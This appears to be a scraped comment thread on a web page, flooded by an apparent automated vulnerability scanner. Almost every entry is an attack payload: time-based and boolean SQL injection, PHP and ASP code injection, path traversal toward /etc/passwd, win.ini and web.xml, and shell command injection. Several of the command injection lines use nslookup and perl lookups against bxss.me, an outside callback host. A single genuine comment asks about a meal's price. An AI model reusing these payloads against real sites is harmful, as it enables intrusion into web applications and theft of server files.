.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Just_Ingest
WEB-INF/web.xml
re: Just_Ingest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Just_Ingest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Just_Ingest
WEB-INF\web.xml
re: Just_Ingest
';print(md5(31337));$a='
re: Just_Ingest
'"
re: Just_Ingest
";print(md5(31337));$a="
re: Just_Ingest
<!--
re: Just_Ingest
${@print(md5(31337))}
re: Just_Ingest
${@print(md5(31337))}\
re: Just_Ingest
'.print(md5(31337)).'
re: Just_Ingest
1
re: Just_Ingest
1
re: Just_Ingest
-1 OR 2+796-796-1=0+0+0+1 --
re: Just_Ingest
-1 OR 3+796-796-1=0+0+0+1 --
re: Just_Ingest
-1 OR 2+987-987-1=0+0+0+1
re: Just_Ingest
-1 OR 3+987-987-1=0+0+0+1
re: Just_Ingest
-1' OR 2+343-343-1=0+0+0+1 --
re: Just_Ingest
-1' OR 3+343-343-1=0+0+0+1 --
re: Just_Ingest
-1' OR 2+513-513-1=0+0+0+1 or 'WN4HwDGS'='
re: Just_Ingest
-1' OR 3+513-513-1=0+0+0+1 or 'WN4HwDGS'='
re: Just_Ingest
-1" OR 2+708-708-1=0+0+0+1 --
re: Just_Ingest
-1" OR 3+708-708-1=0+0+0+1 --
re: Just_Ingest
if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
1 waitfor delay '0:0:15' --
re: Just_Ingest
1aVJM2v3'; waitfor delay '0:0:15' --
re: Just_Ingest
-5 OR 410=(SELECT 410 FROM PG_SLEEP(15))--
re: Just_Ingest
-5) OR 60=(SELECT 60 FROM PG_SLEEP(15))--
re: Just_Ingest
-1)) OR 925=(SELECT 925 FROM PG_SLEEP(15))--
re: Just_Ingest
4dRzVyKj' OR 537=(SELECT 537 FROM PG_SLEEP(15))--
re: Just_Ingest
b4NEovAl') OR 131=(SELECT 131 FROM PG_SLEEP(15))--
re: Just_Ingest
cvmqyYz1')) OR 848=(SELECT 848 FROM PG_SLEEP(15))--
re: Just_Ingest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
1'"
re: Just_Ingest
@@0ovcI
Justin, can I ask what is the cost of your meal there? 38,500jpy?
re: guest
eWyEWjM2
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+802-802-1=0+0+0+1
re: guest
-1 OR 3+802-802-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
clNG0hzC
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 OR 2+772-772-1=0+0+0+1
re: guest
-1 OR 3+772-772-1=0+0+0+1
re: guest
1 waitfor delay '0:0:15' --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
kZhAXP7c'; waitfor delay '0:0:15' --
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
-5 OR 491=(SELECT 491 FROM PG_SLEEP(15))--
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
-5) OR 732=(SELECT 732 FROM PG_SLEEP(15))--
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1)) OR 603=(SELECT 603 FROM PG_SLEEP(15))--
re: guest
-1; waitfor delay '0:0:15' --
re: guest
EyRtiW9b' OR 978=(SELECT 978 FROM PG_SLEEP(15))--
re: guest
-1); waitfor delay '0:0:15' --
re: guest
rWX07zWp') OR 328=(SELECT 328 FROM PG_SLEEP(15))--
re: guest
1 waitfor delay '0:0:15' --
re: guest
7yfvOgsY')) OR 513=(SELECT 513 FROM PG_SLEEP(15))--
re: guest
MqSxdPg7'; waitfor delay '0:0:15' --
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
-5 OR 95=(SELECT 95 FROM PG_SLEEP(15))--
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
-5) OR 816=(SELECT 816 FROM PG_SLEEP(15))--
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
-1)) OR 192=(SELECT 192 FROM PG_SLEEP(15))--
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
D05fbSE4' OR 109=(SELECT 109 FROM PG_SLEEP(15))--
re: guest
@@IucrN
re: guest
pbnZcC7d') OR 409=(SELECT 409 FROM PG_SLEEP(15))--
re: guest
dyYxvfsB')) OR 469=(SELECT 469 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@QcJ79
re: guest
1mxEM56IO
re: guest
response.write(9661717*9785777)
re: guest
'+response.write(9661717*9785777)+'
re: guest
"+response.write(9661717*9785777)+"
re: guest
%0abcc:074625.67-14561.67.b5c43.19990.2@bxss.me
re: guest
to@example.com>%0d%0abcc:074625.67-14562.67.b5c43.19990.2@bxss.me
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
${9999274+9999283}
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
)
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
!(()&&!|*|*|
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
^(#$!@#$)(()))******
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
echo zcggak$()\ kllbgt\nz^xyu||a #' &echo zcggak$()\ kllbgt\nz^xyu||a #|" &echo zcggak$()\ kllbgt\nz^xyu||a #
re: guest
&echo rspkry$()\ fpxrqx\nz^xyu||a #' &echo rspkry$()\ fpxrqx\nz^xyu||a #|" &echo rspkry$()\ fpxrqx\nz^xyu||a #
re: guest
/etc/passwd
re: guest
|echo siqvrd$()\ jygzwc\nz^xyu||a #' |echo siqvrd$()\ jygzwc\nz^xyu||a #|" |echo siqvrd$()\ jygzwc\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
(nslookup hitjhplhrkrtr64878.bxss.me||perl -e "gethostbyname('hitjhplhrkrtr64878.bxss.me')")
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
$(nslookup hitvefmuatkye3e427.bxss.me||perl -e "gethostbyname('hitvefmuatkye3e427.bxss.me')")
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
'.gethostbyname(lc('hituo'.'azjbzpyw85c6b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(78).chr(113).chr(84).'
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
&nslookup hitmqeucetomy08e5a.bxss.me&'\"`0&nslookup hitmqeucetomy08e5a.bxss.me&`'
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
".gethostbyname(lc("hitnt"."ywncnlcy5cb7e.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(69).chr(121).chr(70)."
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
&(nslookup hitvlbrkhqlaxd1683.bxss.me||perl -e "gethostbyname('hitvlbrkhqlaxd1683.bxss.me')")&'\"`0&(nslookup hitvlbrkhqlaxd1683.bxss.me||perl -e "gethostbyname('hitvlbrkhqlaxd1683.bxss.me')")&`'
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
Http://bxss.me/t/fit.txt
re: guest
|(nslookup hitddhdpiwspn261f8.bxss.me||perl -e "gethostbyname('hitddhdpiwspn261f8.bxss.me')")
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
`(nslookup hitroyjbbykso99599.bxss.me||perl -e "gethostbyname('hitroyjbbykso99599.bxss.me')")`
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
/etc/shells
re: guest
;(nslookup hitddnyptaifa41675.bxss.me||perl -e "gethostbyname('hitddnyptaifa41675.bxss.me')")|(nslookup hitddnyptaifa41675.bxss.me||perl -e "gethostbyname('hitddnyptaifa41675.bxss.me')")&(nslookup hitddnyptaifa41675.bxss.me||perl -e "gethostbyname('hitddnyptaifa41675.bxss.me')")
re: guest
file:///etc/passwd
re: guest
c:/windows/win.ini
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
bxss.me
re: guest
/WEB-INF/web.xml
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(109).concat(83).concat(101).concat(70)+(require"socket"
Socket.gethostbyname("hitsv"+"srltxmvbff0eb.bxss.me.")[3].to_s)+"
re: guest
/../../../../../../../../../../boot.ini
re: guest
'+'A'.concat(70-3).concat(22*4).concat(105).concat(84).concat(114).concat(67)+(require'socket'
Socket.gethostbyname('hitxt'+'edjaxxpwc7bb9.bxss.me.')[3].to_s)+'
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
';print(md5(31337));$a='
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
";print(md5(31337));$a="
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
'"
re: guest
${@print(md5(31337))}
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
<!--
re: guest
${@print(md5(31337))}\
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
'.print(md5(31337)).'
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
1
re: guest
1
re: guest
-1 OR 2+43-43-1=0+0+0+1 --
re: guest
-1 OR 3+43-43-1=0+0+0+1 --
re: guest
-1 OR 2+202-202-1=0+0+0+1
re: guest
-1 OR 3+202-202-1=0+0+0+1
re: guest
-1' OR 2+607-607-1=0+0+0+1 --
re: guest
-1' OR 3+607-607-1=0+0+0+1 --
re: guest
-1' OR 2+847-847-1=0+0+0+1 or 'FJJ4Jvbq'='
re: guest
-1' OR 3+847-847-1=0+0+0+1 or 'FJJ4Jvbq'='
re: guest
-1" OR 2+19-19-1=0+0+0+1 --
re: guest
-1" OR 3+19-19-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
SsZxthme'; waitfor delay '0:0:15' --
re: guest
-5 OR 48=(SELECT 48 FROM PG_SLEEP(15))--
re: guest
-5) OR 371=(SELECT 371 FROM PG_SLEEP(15))--
re: guest
-1)) OR 44=(SELECT 44 FROM PG_SLEEP(15))--
re: guest
xJmNndE5' OR 962=(SELECT 962 FROM PG_SLEEP(15))--
re: guest
dc6uvBi5') OR 95=(SELECT 95 FROM PG_SLEEP(15))--
re: guest
9vGGlwcE')) OR 934=(SELECT 934 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@QI5ye
